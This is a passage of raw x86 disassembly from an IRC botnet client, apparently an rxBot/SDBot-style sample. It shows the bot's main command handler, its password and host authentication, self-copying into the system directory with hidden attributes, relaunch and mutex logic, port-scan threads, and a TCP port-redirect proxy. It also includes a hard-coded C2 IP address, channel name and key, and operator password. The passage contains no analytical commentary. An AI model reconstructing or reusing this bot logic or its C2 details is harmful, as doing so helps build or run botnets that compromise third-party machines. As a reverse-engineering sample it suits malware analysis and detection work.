mov esi, [ebp+ebx+var_90]
cmp esi, edi
mov [ebp+var_AC], esi
jz short loc_40CD14
cmp byte ptr [esi], 23h
jz short loc_40CD14
push esi
lea eax, [ebp+var_67C]
push 10h
push eax
call sub_412E0D
push 78h
push esi
call sub_413F30
add esp, 14h
neg eax
sbb eax, eax
neg eax
mov [ebp+var_4B8], eax
jmp loc_40CE4A
; ---------------------------------------------------------------------------
loc_40CD14: ; CODE XREF: sub_4078FA+53E8�j
; sub_4078FA+53ED�j
cmp [ebp+var_432], 0
jz short loc_40CD3E
push 7Fh
lea eax, [ebp+var_66C]
push offset dword_42AF44
push eax
call sub_412C40
mov eax, dword_42AF54
add esp, 0Ch
mov [ebp+var_5EC], eax
loc_40CD3E: ; CODE XREF: sub_4078FA+5421�j
cmp [ebp+var_43B], 0
jz short loc_40CD6A
push edi
push 9
push offset aStoppingPrevio ; "Stopping previous scans"
push offset aScan_0 ; "[SCAN]"
push 1
push [ebp+var_4]
push [ebp+var_9C]
push [ebp+arg_4]
call sub_411120
add esp, 20h
loc_40CD6A: ; CODE XREF: sub_4078FA+544B�j
cmp [ebp+var_44B], 0
jnz short loc_40CD8F
cmp [ebp+var_44A], 0
jnz short loc_40CD8F
cmp [ebp+var_43A], 0
jnz short loc_40CD8F
push offset aScanFailedTo_2 ; "[SCAN]: Failed to start scan, no IP spe"...
jmp loc_40C8B2
; ---------------------------------------------------------------------------
loc_40CD8F: ; CODE XREF: sub_4078FA+5477�j
; sub_4078FA+5480�j ...
push 10h
pop esi
lea eax, [ebp+var_A8]
push eax
lea eax, [ebp+var_C8]
push eax
push [ebp+arg_4]
mov [ebp+var_A8], esi
call dword_433418 ; getsockname
mov al, [ebp+var_44B]
neg al
push esi
sbb eax, eax
and eax, 0FFFF0100h
add eax, 0FFFFh
and [ebp+var_C4], eax
push [ebp+var_C4]
call dword_433520 ; inet_ntoa
push eax
lea eax, [ebp+var_67C]
push eax
call sub_412C40
add esp, 0Ch
cmp [ebp+var_43A], 0
jz short loc_40CE44
xor eax, eax
cmp [ebp+var_44B], al
push 30h
setnz al
inc eax
inc eax
mov esi, eax
lea eax, [ebp+var_67C]
push eax
call sub_412C10
and byte ptr [ebp+arg_0+3], 0
cmp esi, edi
pop ecx
pop ecx
jle short loc_40CE38
loc_40CE16: ; CODE XREF: sub_4078FA+553C�j
cmp eax, edi
jz short loc_40CE38
mov byte ptr [eax], 78h
lea eax, [ebp+var_67C]
push 30h
push eax
call sub_412C10
inc byte ptr [ebp+arg_0+3]
pop ecx
pop ecx
movsx ecx, byte ptr [ebp+arg_0+3]
cmp ecx, esi
jl short loc_40CE16
loc_40CE38: ; CODE XREF: sub_4078FA+551A�j
; sub_4078FA+551E�j
mov [ebp+var_4B8], 1
jmp short loc_40CE4A
; ---------------------------------------------------------------------------
loc_40CE44: ; CODE XREF: sub_4078FA+54F3�j
mov [ebp+var_4B8], edi
loc_40CE4A: ; CODE XREF: sub_4078FA+5415�j
; sub_4078FA+5548�j
mov eax, [ebp+arg_4]
push [ebp+var_9C]
mov [ebp+var_4E8], eax
mov eax, [ebp+var_4]
mov [ebp+var_4C0], eax
mov eax, [ebp+var_C]
mov [ebp+var_4BC], eax
mov esi, 80h
lea eax, [ebp+var_5E8]
push esi
push eax
call sub_412E0D
mov ebx, [ebp+ebx+var_8C]
add esp, 0Ch
cmp ebx, edi
jz short loc_40CE9E
push ebx
loc_40CE8C: ; CODE XREF: sub_4078FA+55B4�j
push esi
loc_40CE8D: ; CODE XREF: sub_4078FA+55D1�j
lea eax, [ebp+var_568]
push eax
call sub_412E0D
add esp, 0Ch
jmp short loc_40CED4
; ---------------------------------------------------------------------------
loc_40CE9E: ; CODE XREF: sub_4078FA+558F�j
mov eax, [ebp+var_AC]
cmp eax, edi
jz short loc_40CEB0
cmp byte ptr [eax], 23h
jnz short loc_40CEB0
push eax
jmp short loc_40CE8C
; ---------------------------------------------------------------------------
loc_40CEB0: ; CODE XREF: sub_4078FA+55AC�j
; sub_4078FA+55B1�j
xor ecx, ecx
mov eax, offset aMurders ; "#murders"
inc ecx
mov edi, 41FA76h
mov esi, eax
xor edx, edx
repe cmpsb
jz short loc_40CECD
push eax
push 80h
jmp short loc_40CE8D
; ---------------------------------------------------------------------------
loc_40CECD: ; CODE XREF: sub_4078FA+55C9�j
and [ebp+var_568], 0
loc_40CED4: ; CODE XREF: sub_4078FA+55A2�j
xor esi, esi
cmp [ebp+var_4B8], esi
mov eax, offset aRandom ; "Random"
jnz short loc_40CEE8
mov eax, offset aSequential ; "Sequential"
loc_40CEE8: ; CODE XREF: sub_4078FA+55E7�j
push [ebp+var_4CC]
lea ecx, [ebp+var_67C]
push [ebp+var_4DC]
push [ebp+var_4E0]
push [ebp+var_4E4]
push ecx
push eax
lea eax, [ebp+var_2E0]
push offset aScanSPortScanS ; "[SCAN]: %s Port Scan started on %s:%d w"...
push eax
call sub_412BB5
push esi
lea eax, [ebp+var_2E0]
push 9
push eax
call sub_410EEA
add esp, 2Ch
mov [ebp+var_4D8], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_67C]
push eax
push offset sub_4018D1
push esi
push esi
call ds:dword_41F00C ; CreateThread
mov ecx, [ebp+var_4D8]
imul ecx, 234h
cmp eax, esi
mov dword_43434C[ecx], eax
jnz short loc_40CF88
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
push offset aScanFailedTo_0 ; "[SCAN]: Failed to start scan thread, er"...
loc_40CF6C: ; CODE XREF: sub_4078FA+50D7�j
lea eax, [ebp+var_2E0]
push eax
call sub_412BB5
add esp, 0Ch
jmp loc_40CA03
; ---------------------------------------------------------------------------
loc_40CF80: ; CODE XREF: sub_4078FA+5694�j
push 32h
call ds:dword_41F000 ; Sleep
loc_40CF88: ; CODE XREF: sub_4078FA+5664�j
cmp [ebp+var_4B4], esi
jz short loc_40CF80
jmp loc_40CA03
; ---------------------------------------------------------------------------
loc_40CF95: ; CODE XREF: sub_4078FA+D27�j
; sub_4078FA+D3B�j
push [ebp+ebx+var_A0]
xor eax, eax
cmp [ebp+var_43C], al
setnz al
push eax
push dword_42AE64
lea eax, [ebp+var_3AC]
push eax
call sub_40E7B0
lea eax, [ebp+var_3AC]
push eax
push offset aNickS_0 ; "NICK %s\r\n"
push [ebp+arg_4]
call sub_404592
lea eax, [ebp+var_3AC]
push eax
push offset aMainRandomNick ; "[MAIN]: Random nick change: %s"
call sub_401CA7
loc_40CFDF: ; CODE XREF: sub_4078FA+4DC5�j
add esp, 24h
loc_40CFE2: ; CODE XREF: sub_4078FA+73B�j
; sub_4078FA+747�j ...
mov eax, [ebp+arg_24]
jmp loc_407B7E
; ---------------------------------------------------------------------------
loc_40CFEA: ; CODE XREF: sub_4078FA+7C8�j
; sub_4078FA+7DC�j
mov ebx, [ebp+ebx+var_A0]
test ebx, ebx
mov [ebp+var_8], ebx
jz loc_407B7B
cmp [ebp+var_20], 0
jnz loc_407B7B
push offset asc_4264C0 ; "!"
push [ebp+var_A4]
call sub_413859
mov esi, eax
push offset dword_424824
push 0
inc esi
call sub_413859
push offset asc_424820 ; "~"
push eax
call sub_413859
mov edi, [ebp+var_8]
mov ebx, eax
add esp, 18h
mov eax, offset aN3m3s1s ; "n3m3s1s"
loc_40D03D: ; CODE XREF: sub_4078FA+575F�j
mov dl, [eax]
mov cl, dl
cmp dl, [edi]
jnz short loc_40D05F
test cl, cl
jz short loc_40D05B
mov dl, [eax+1]
mov cl, dl
cmp dl, [edi+1]
jnz short loc_40D05F
inc eax
inc eax
inc edi
inc edi
test cl, cl
jnz short loc_40D03D
loc_40D05B: ; CODE XREF: sub_4078FA+574D�j
xor eax, eax
jmp short loc_40D064
; ---------------------------------------------------------------------------
loc_40D05F: ; CODE XREF: sub_4078FA+5749�j
; sub_4078FA+5757�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_40D064: ; CODE XREF: sub_4078FA+5763�j
test eax, eax
jz short loc_40D0B3
push ebx
lea eax, [ebp+var_E0]
push eax
lea eax, [ebp+var_E0]
push eax
push offset aNoticeSPassAut ; "NOTICE %s :Pass auth failed (%s!%s).\r\n"
push [ebp+arg_4]
call sub_404592
lea eax, [ebp+var_E0]
push eax
push offset aNoticeSYourAtt ; "NOTICE %s :Your attempt has been logged"...
push [ebp+arg_4]
call sub_404592
push ebx
push esi
push offset aMainFailedPass ; "[MAIN]: *Failed pass auth by: (%s!%s)."
loc_40D09F: ; CODE XREF: sub_4078FA+580C�j
lea eax, [ebp+var_2E0]
push eax
call sub_412BB5
add esp, 30h
jmp loc_40C4A1
; ---------------------------------------------------------------------------
loc_40D0B3: ; CODE XREF: sub_4078FA+576C�j
xor edi, edi
loc_40D0B5: ; CODE XREF: sub_4078FA+57D3�j
push ebx
push off_42AF3C[edi]
call sub_4115E8
test eax, eax
pop ecx
pop ecx
jnz short loc_40D108
add edi, 4
cmp edi, 4
jb short loc_40D0B5
push ebx
lea eax, [ebp+var_E0]
push eax
lea eax, [ebp+var_E0]
push eax
push offset aNoticeSHostAut ; "NOTICE %s :Host Auth failed (%s!%s).\r\n"
push [ebp+arg_4]
call sub_404592
lea eax, [ebp+var_E0]
push eax
push offset aNoticeSYourAtt ; "NOTICE %s :Your attempt has been logged"...
push [ebp+arg_4]
call sub_404592
push ebx
push esi
push offset aMainFailedHost ; "[MAIN]: *Failed host auth by: (%s!%s)."
jmp short loc_40D09F
; ---------------------------------------------------------------------------
loc_40D108: ; CODE XREF: sub_4078FA+57CB�j
mov edx, [ebp+arg_18]
xor eax, eax
loc_40D10D: ; CODE XREF: sub_4078FA+5855�j
cmp byte ptr [edx], 0
jnz short loc_40D145
mov edi, [ebp+var_8]
mov esi, offset aN3m3s1s ; "n3m3s1s"
loc_40D11A: ; CODE XREF: sub_4078FA+583C�j
mov bl, [esi]
mov cl, bl
cmp bl, [edi]
jnz short loc_40D13C
test cl, cl
jz short loc_40D138
mov bl, [esi+1]
mov cl, bl
cmp bl, [edi+1]
jnz short loc_40D13C
inc esi
inc esi
inc edi
inc edi
test cl, cl
jnz short loc_40D11A
loc_40D138: ; CODE XREF: sub_4078FA+582A�j
xor ecx, ecx
jmp short loc_40D141
; ---------------------------------------------------------------------------
loc_40D13C: ; CODE XREF: sub_4078FA+5826�j
; sub_4078FA+5834�j
sbb ecx, ecx
sbb ecx, 0FFFFFFFFh
loc_40D141: ; CODE XREF: sub_4078FA+5840�j
test ecx, ecx
jz short loc_40D156
loc_40D145: ; CODE XREF: sub_4078FA+5816�j
inc eax
add edx, 80h
cmp eax, 2
jl short loc_40D10D
jmp loc_407B7B
; ---------------------------------------------------------------------------
loc_40D156: ; CODE XREF: sub_4078FA+5849�j
shl eax, 7
add eax, [ebp+arg_18]
push 7Fh
lea ecx, [ebp+var_C04]
push ecx
push eax
call sub_412C40
add esp, 0Ch
cmp [ebp+var_C], 0
jnz short loc_40D18F
push 0
push [ebp+var_4]
push offset aMainPasswordAc ; "[MAIN]: Password accepted."
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4045DD
add esp, 14h
loc_40D18F: ; CODE XREF: sub_4078FA+5878�j
lea eax, [ebp+var_E0]
push eax
push offset aMainUserSLog_1 ; "[MAIN]: User: %s logged in."
loc_40D19B: ; CODE XREF: sub_4078FA+6F8�j
; sub_4078FA+45F8�j ...
call sub_401CA7
pop ecx
loc_40D1A1: ; CODE XREF: sub_4078FA+32FC�j
pop ecx
jmp loc_407B7B
; ---------------------------------------------------------------------------
loc_40D1A7: ; CODE XREF: sub_4078FA+1FD�j
; sub_4078FA+210�j
push [ebp+arg_10]
push offset aUserhostS ; "USERHOST %s\r\n"
push [ebp+arg_4]
call sub_404592
push offset aIx ; "+ix"
push [ebp+arg_10]
push offset aModeSS ; "MODE %s %s\r\n"
push [ebp+arg_4]
call sub_404592
push [ebp+arg_C]
push [ebp+arg_8]
push offset aJoinSS_0 ; "JOIN %s %s\r\n"
push [ebp+arg_4]
call sub_404592
xor eax, eax
add esp, 2Ch
inc eax
mov dword_479BB8, eax
jmp loc_407B7E
sub_4078FA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D1EF proc near ; CODE XREF: .text:00414AA6�p
var_98C = byte ptr -98Ch
var_888 = byte ptr -888h
var_887 = byte ptr -887h
var_6F8 = byte ptr -6F8h
var_5F8 = byte ptr -5F8h
var_4F8 = byte ptr -4F8h
var_3F4 = byte ptr -3F4h
var_2F0 = byte ptr -2F0h
var_1EC = byte ptr -1ECh
var_E8 = byte ptr -0E8h
var_68 = dword ptr -68h
var_5C = dword ptr -5Ch
var_3C = dword ptr -3Ch
var_38 = word ptr -38h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 98Ch
push ebx
xor ebx, ebx
push esi
push edi
mov [ebp+var_10], ebx
mov [ebp+var_C], ebx
mov [ebp+var_8], offset sub_402795
push [ebp+var_8]
push large dword ptr fs:0
mov large fs:0, esp
mov esi, ds:dword_41F004
call esi ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
mov dword_479BB0, eax
call esi ; GetTickCount
push eax
call sub_412D64
pop ecx
call sub_40468E
push 2
call dword_433478 ; SetErrorMode
push 7530h
push offset aBot018 ; "Bot018"
push ebx
push ebx
call ds:dword_41F0DC ; CreateMutexA
push eax
call ds:dword_41F0D8 ; WaitForSingleObject
cmp eax, 102h
jnz short loc_40D26E
push 1
jmp loc_40D4CE
; ---------------------------------------------------------------------------
loc_40D26E: ; CODE XREF: sub_40D1EF+76�j
lea eax, [ebp+var_888]
push eax
push 202h
call dword_4334B0 ; WSAStartup
cmp eax, ebx
mov [ebp+var_8], eax
jnz loc_40D73B
cmp [ebp+var_888], 2
jnz loc_40D735
cmp [ebp+var_887], 2
jnz loc_40D735
mov esi, 104h
push esi
lea eax, [ebp+var_3F4]
push eax
call ds:dword_41F040 ; GetSystemDirectoryA
push esi
lea eax, [ebp+var_2F0]
push eax
push ebx
call ds:dword_41F078 ; GetModuleHandleA
push eax
call ds:dword_41F010 ; GetModuleFileNameA
lea eax, [ebp+var_5F8]
push eax
lea eax, [ebp+var_6F8]
push eax
push ebx
lea eax, [ebp+var_2F0]
push ebx
push eax
call sub_4141AD
lea eax, [ebp+var_5F8]
push eax
lea eax, [ebp+var_6F8]
push eax
push offset aSS ; "%s%s"
lea eax, [ebp+var_4F8]
push esi
push eax
call sub_412E0D
lea eax, [ebp+var_3F4]
push eax
lea eax, [ebp+var_2F0]
push eax
call sub_413920
add esp, 30h
test eax, eax
jnz loc_40D4D4
cmp dword_42AE54, ebx
mov esi, offset byte_42AED0
jz short loc_40D376
mov eax, esi
xor edi, edi
lea ecx, [eax+1]
loc_40D33C: ; CODE XREF: sub_40D1EF+152�j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_40D33C
sub eax, ecx
add eax, 0FFFFFFFAh
test eax, eax
jbe short loc_40D376
loc_40D34C: ; CODE XREF: sub_40D1EF+185�j
call sub_412D71
cdq
push 1Ah
pop ecx
idiv ecx
mov eax, esi
lea ecx, [eax+1]
add dl, 61h
mov byte_42AED0[edi], dl
inc edi
loc_40D366: ; CODE XREF: sub_40D1EF+17C�j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_40D366
sub eax, ecx
add eax, 0FFFFFFFAh
cmp edi, eax
jb short loc_40D34C
loc_40D376: ; CODE XREF: sub_40D1EF+144�j
; sub_40D1EF+15B�j
push esi
lea eax, [ebp+var_3F4]
push eax
lea eax, [ebp+var_1EC]
push offset aSS_5 ; "%s\\%s"
push eax
call sub_412BB5
add esp, 10h
lea eax, [ebp+var_1EC]
push eax
call ds:dword_41F06C ; GetFileAttributesA
cmp eax, 0FFFFFFFFh
jz short loc_40D3B6
push 80h
lea eax, [ebp+var_1EC]
push eax
call ds:dword_41F0A0 ; SetFileAttributesA
loc_40D3B6: ; CODE XREF: sub_40D1EF+1B3�j
mov esi, ds:dword_41F000
push 7D0h
call esi ; Sleep
mov edi, ds:dword_41F0D4
mov [ebp+var_4], ebx
jmp short loc_40D3F1
; ---------------------------------------------------------------------------
loc_40D3CE: ; CODE XREF: sub_40D1EF+215�j
call ds:dword_41F008 ; RtlGetLastWin32Error
cmp [ebp+var_4], ebx
jnz short loc_40D406
cmp eax, 20h
jz short loc_40D3E3
cmp eax, 5
jnz short loc_40D406
loc_40D3E3: ; CODE XREF: sub_40D1EF+1ED�j
push 3A98h
mov [ebp+var_4], 1
call esi ; Sleep
loc_40D3F1: ; CODE XREF: sub_40D1EF+1DD�j
push ebx
lea eax, [ebp+var_1EC]
push eax
lea eax, [ebp+var_2F0]
push eax
call edi ; CopyFileA
test eax, eax
jz short loc_40D3CE
loc_40D406: ; CODE XREF: sub_40D1EF+1E8�j
; sub_40D1EF+1F2�j
lea eax, [ebp+var_1EC]
push eax
call sub_40584F
pop ecx
push 7
lea eax, [ebp+var_1EC]
push eax
call ds:dword_41F0A0 ; SetFileAttributesA
xor eax, eax
lea edi, [ebp+var_24]
stosd
stosd
stosd
stosd
push 11h
pop ecx
xor eax, eax
lea edi, [ebp+var_68]
rep stosd
xor edi, edi
inc edi
mov [ebp+var_5C], 41FA76h
mov [ebp+var_68], 44h
mov [ebp+var_3C], edi
mov [ebp+var_38], bx
call ds:dword_41F0D0 ; GetCurrentProcessId
push eax
push edi
push 100000h
call ds:dword_41F0C4 ; OpenProcess
lea ecx, [ebp+var_2F0]
push ecx
push eax
lea eax, [ebp+var_1EC]
push eax
lea eax, [ebp+var_98C]
push offset aSDS ; "%s %d \"%s\""
push eax
call sub_412BB5
add esp, 14h
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_68]
push eax
lea eax, [ebp+var_3F4]
push eax
push ebx
push 28h
push edi
push ebx
push ebx
lea eax, [ebp+var_98C]
push eax
lea eax, [ebp+var_1EC]
push eax
call ds:dword_41F030 ; CreateProcessA
test eax, eax
jz short loc_40D4DA
push 0C8h
call esi ; Sleep
push [ebp+var_24]
mov esi, ds:dword_41F034
call esi ; CloseHandle
push [ebp+var_20]
call esi ; CloseHandle
call dword_4335B8 ; WSACleanup
push ebx
loc_40D4CE: ; CODE XREF: sub_40D1EF+7A�j
call ds:dword_41F02C ; ExitProcess
loc_40D4D4: ; CODE XREF: sub_40D1EF+133�j
mov esi, ds:dword_41F000
loc_40D4DA: ; CODE XREF: sub_40D1EF+2BF�j
cmp dword_479E70, 2
jle short loc_40D522
mov eax, dword_479E74
push dword ptr [eax+4]
call sub_412F42
pop ecx
mov edi, eax
push 0FFFFFFFFh
push edi
call ds:dword_41F0D8 ; WaitForSingleObject
push edi
call ds:dword_41F034 ; CloseHandle
mov eax, dword_479E74
cmp [eax+8], ebx
jz short loc_40D522
push 7D0h
call esi ; Sleep
mov eax, dword_479E74
push dword ptr [eax+8]
call ds:dword_41F0B8 ; DeleteFileA
loc_40D522: ; CODE XREF: sub_40D1EF+2F2�j
; sub_40D1EF+31C�j
cmp dword_42AE58, ebx
jz short loc_40D53F
cmp dword_433600, ebx
jnz short loc_40D53F
lea eax, [ebp+var_4F8]
push eax
call sub_401E73
pop ecx
loc_40D53F: ; CODE XREF: sub_40D1EF+339�j
; sub_40D1EF+341�j
lea eax, [ebp+var_E8]
push offset aMainBotStarted ; "[MAIN]: Bot started."
push eax
call sub_412BB5
push ebx
lea eax, [ebp+var_E8]
push ebx
push eax
call sub_410EEA
lea eax, [ebp+var_E8]
push eax
call sub_401C33
xor eax, eax
mov ecx, 2E0h
mov edi, offset dword_479030
rep stosd
lea eax, [ebp+var_E8]
push offset aSecureSystemSe ; "[SECURE]: System secure monitor active."...
push eax
call sub_412BB5
push ebx
lea eax, [ebp+var_E8]
push 1Ah
push eax
call sub_410EEA
add esp, 2Ch
mov edi, eax
lea eax, [ebp+var_10]
push eax
push ebx
push ebx
push offset sub_40F005
push ebx
push ebx
call ds:dword_41F00C ; CreateThread
imul edi, 234h
cmp eax, ebx
mov dword_43434C[edi], eax
jnz short loc_40D5DB
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_E8]
push offset aSecureFailedTo ; "[SECURE]: Failed to start secure thread"...
push eax
call sub_412BB5
add esp, 0Ch
loc_40D5DB: ; CODE XREF: sub_40D1EF+3CF�j
lea eax, [ebp+var_E8]
push eax
call sub_401C33
push 7Fh
push offset a217_170_244_2 ; "217.170.244.2"
push offset dword_478ECC
mov dword_479BBC, ebx
call sub_412C40
mov eax, dword_42AE38
push 3Fh
push offset aHell ; "#hell"
mov esi, offset dword_478F4C
push esi
mov dword_47901C, eax
call sub_412C40
push 3Fh
push offset aTroopers ; "troopers"
mov edi, offset dword_478F8C
push edi
call sub_412C40
add esp, 28h
mov dword_479020, ebx
loc_40D635: ; CODE XREF: sub_40D1EF+4EC�j
; sub_40D1EF+4F7�j ...
mov [ebp+var_4], ebx
loc_40D638: ; CODE XREF: sub_40D1EF+4A0�j
cmp dword_433618, ebx
jnz short loc_40D656
push ebx
lea eax, [ebp+var_14]
push eax
call dword_433428 ; InternetGetConnectedState
test eax, eax
jnz short loc_40D656
push 7530h
jmp short loc_40D682
; ---------------------------------------------------------------------------
loc_40D656: ; CODE XREF: sub_40D1EF+44F�j
; sub_40D1EF+45E�j
push offset dword_478EC8
mov dword_479BB8, ebx
call sub_40779B
cmp eax, 2
mov [ebp+var_8], eax
jz loc_40D730
cmp dword_479BB8, ebx
jz short loc_40D67D
dec [ebp+var_4]
loc_40D67D: ; CODE XREF: sub_40D1EF+489�j
push 0BB8h
loc_40D682: ; CODE XREF: sub_40D1EF+465�j
call ds:dword_41F000 ; Sleep
inc [ebp+var_4]
cmp [ebp+var_4], 3
jl short loc_40D638
cmp [ebp+var_8], 2
jz loc_40D730
cmp [ebp+var_C], ebx
jz short loc_40D6E0
push 7Fh
push offset a217_170_244_2 ; "217.170.244.2"
push offset dword_478ECC
call sub_412C40
mov eax, dword_42AE38
push 3Fh
push offset aHell ; "#hell"
push esi
mov dword_47901C, eax
call sub_412C40
push 3Fh
push offset aTroopers ; "troopers"
push edi
call sub_412C40
add esp, 24h
mov [ebp+var_C], ebx
jmp loc_40D635
; ---------------------------------------------------------------------------
loc_40D6E0: ; CODE XREF: sub_40D1EF+4AF�j
cmp byte_42AEAC, bl
jz loc_40D635
push 7Fh
push offset byte_42AEAC
push offset dword_478ECC
call sub_412C40
mov eax, dword_42AE3C
push 3Fh
push offset dword_42AEBC
push esi
mov dword_47901C, eax
call sub_412C40
push 3Fh
push offset aTroopers_0 ; "troopers"
push edi
call sub_412C40
add esp, 24h
mov [ebp+var_C], 1
jmp loc_40D635
; ---------------------------------------------------------------------------
loc_40D730: ; CODE XREF: sub_40D1EF+47D�j
; sub_40D1EF+4A6�j
call sub_41105B
loc_40D735: ; CODE XREF: sub_40D1EF+A3�j
; sub_40D1EF+B0�j
call dword_4335B8 ; WSACleanup
loc_40D73B: ; CODE XREF: sub_40D1EF+96�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 10h
sub_40D1EF endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_40D744 proc near ; DATA XREF: sub_40D7DF+12C�o
var_1128 = byte ptr -1128h
var_128 = byte ptr -128h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1128h
call sub_412DD0
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 4Ah
pop ecx
mov esi, eax
lea edi, [ebp+var_128]
rep movsd
mov esi, [ebp+var_14]
mov dword ptr [eax+124h], 1
imul esi, 234h
mov ebx, 1000h
jmp short loc_40D799
; ---------------------------------------------------------------------------
loc_40D77E: ; CODE XREF: sub_40D744+7B�j
push 0
push eax
lea eax, [ebp+var_1128]
push eax
push dword_434344[esi]
call dword_433534 ; send
cmp eax, 0FFFFFFFFh
jz short loc_40D7C1
loc_40D799: ; CODE XREF: sub_40D744+38�j
xor eax, eax
push eax
lea edi, [ebp+var_1128]
mov ecx, 400h
rep stosd
push ebx
lea eax, [ebp+var_1128]
push eax
push dword_434348[esi]
call dword_433414 ; recv
test eax, eax
jg short loc_40D77E
loc_40D7C1: ; CODE XREF: sub_40D744+53�j
push dword_434348[esi]
call dword_4335AC ; closesocket
push [ebp+var_14]
call sub_4111AE
pop ecx
push 0
call ds:dword_41F014 ; ExitThread
int 3 ; Trap to Debugger
sub_40D744 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_40D7DF proc near ; DATA XREF: sub_40D9BC+118�o
var_1344 = byte ptr -1344h
var_344 = byte ptr -344h
var_144 = byte ptr -144h
var_13C = byte ptr -13Ch
var_3C = dword ptr -3Ch
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1344h
call sub_412DD0
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 4Ah
pop ecx
mov esi, eax
lea edi, [ebp+var_144]
rep movsd
mov esi, [ebp+var_30]
xor ecx, ecx
inc ecx
push 6
push ecx
push 2
mov [eax+120h], ecx
mov [ebp+var_4], esi
call dword_4334A0 ; socket
xor ebx, ebx
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz loc_40D93E
push [ebp+var_3C]
xor eax, eax
lea edi, [ebp+var_18]
stosd
stosd
stosd
stosd
mov [ebp+var_18], 2
call dword_4335EC ; ntohs
mov [ebp+var_16], ax
lea eax, [ebp+var_13C]
push eax
call dword_433514 ; inet_addr
cmp eax, 0FFFFFFFFh
mov [ebp+var_8], eax
jnz short loc_40D867
lea eax, [ebp+var_13C]
push eax
call dword_433500 ; gethostbyname
jmp short loc_40D875
; ---------------------------------------------------------------------------
loc_40D867: ; CODE XREF: sub_40D7DF+77�j
push 2
push 4
lea eax, [ebp+var_8]
push eax
call dword_433590 ; gethostbyaddr
loc_40D875: ; CODE XREF: sub_40D7DF+86�j
cmp eax, ebx
jz loc_40D93E
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_14], eax
push 10h
lea eax, [ebp+var_18]
push eax
push [ebp+arg_0]
call dword_433458 ; connect
cmp eax, 0FFFFFFFFh
jz loc_40D93E
push [ebp+var_34]
movzx eax, [ebp+var_16]
push eax
push [ebp+var_14]
mov [ebp+var_20], ebx
call dword_433520 ; inet_ntoa
push eax
lea eax, [ebp+var_344]
push offset aRedirectClient ; "[REDIRECT]: Client connection to IP: %s"...
push eax
call sub_412BB5
push [ebp+arg_0]
lea eax, [ebp+var_344]
push 11h
push eax
call sub_410EEA
imul esi, 234h
mov ecx, [ebp+var_34]
mov [ebp+var_30], eax
imul eax, 234h
mov dword_43433C[eax], ecx
add esp, 20h
lea esi, dword_434344[esi]
mov ecx, [esi]
mov dword_434348[eax], ecx
lea eax, [ebp+var_1C]
push eax
push ebx
lea eax, [ebp+var_144]
push eax
push offset sub_40D744
push ebx
push ebx
call ds:dword_41F00C ; CreateThread
mov ecx, [ebp+var_30]
imul ecx, 234h
cmp eax, ebx
mov dword_43434C[ecx], eax
jnz short loc_40D974
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
push offset aRedirectFail_0 ; "[REDIRECT]: Failed to start connection "...
call sub_401CA7
pop ecx
pop ecx
loc_40D93E: ; CODE XREF: sub_40D7DF+42�j
; sub_40D7DF+98�j ...
mov eax, [ebp+var_4]
imul eax, 234h
push dword_434344[eax]
call dword_4335AC ; closesocket
push [ebp+arg_0]
call dword_4335AC ; closesocket
push [ebp+var_4]
call sub_4111AE
pop ecx
push ebx
call ds:dword_41F014 ; ExitThread
loc_40D96C: ; CODE XREF: sub_40D7DF+198�j
push 32h
call ds:dword_41F000 ; Sleep
loc_40D974: ; CODE XREF: sub_40D7DF+14A�j
cmp [ebp+var_20], ebx
jz short loc_40D96C
jmp short loc_40D992
; ---------------------------------------------------------------------------
loc_40D97B: ; CODE XREF: sub_40D7DF+1D9�j
push ebx
push eax
lea eax, [ebp+var_1344]
push eax
push [ebp+arg_0]
call dword_433534 ; send
cmp eax, 0FFFFFFFFh
jz short loc_40D93E
loc_40D992: ; CODE XREF: sub_40D7DF+19A�j
xor eax, eax
push ebx
lea edi, [ebp+var_1344]
mov ecx, 400h
rep stosd
push 1000h
lea eax, [ebp+var_1344]
push eax
push dword ptr [esi]
call dword_433414 ; recv
cmp eax, ebx
jg short loc_40D97B
jmp short loc_40D93E
sub_40D7DF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D9BC proc near ; DATA XREF: sub_4078FA+26DC�o
var_34C = byte ptr -34Ch
var_14C = byte ptr -14Ch
var_148 = dword ptr -148h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_2C = dword ptr -2Ch
var_24 = byte ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = byte ptr -14h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 34Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov esi, eax
push 4Ah
pop ecx
lea edi, [ebp+var_14C]
rep movsd
push [ebp+var_40]
xor esi, esi
inc esi
mov [eax+120h], esi
xor eax, eax
lea edi, [ebp+var_10]
stosd
stosd
stosd
stosd
mov [ebp+var_10], 2
call dword_4335EC ; ntohs
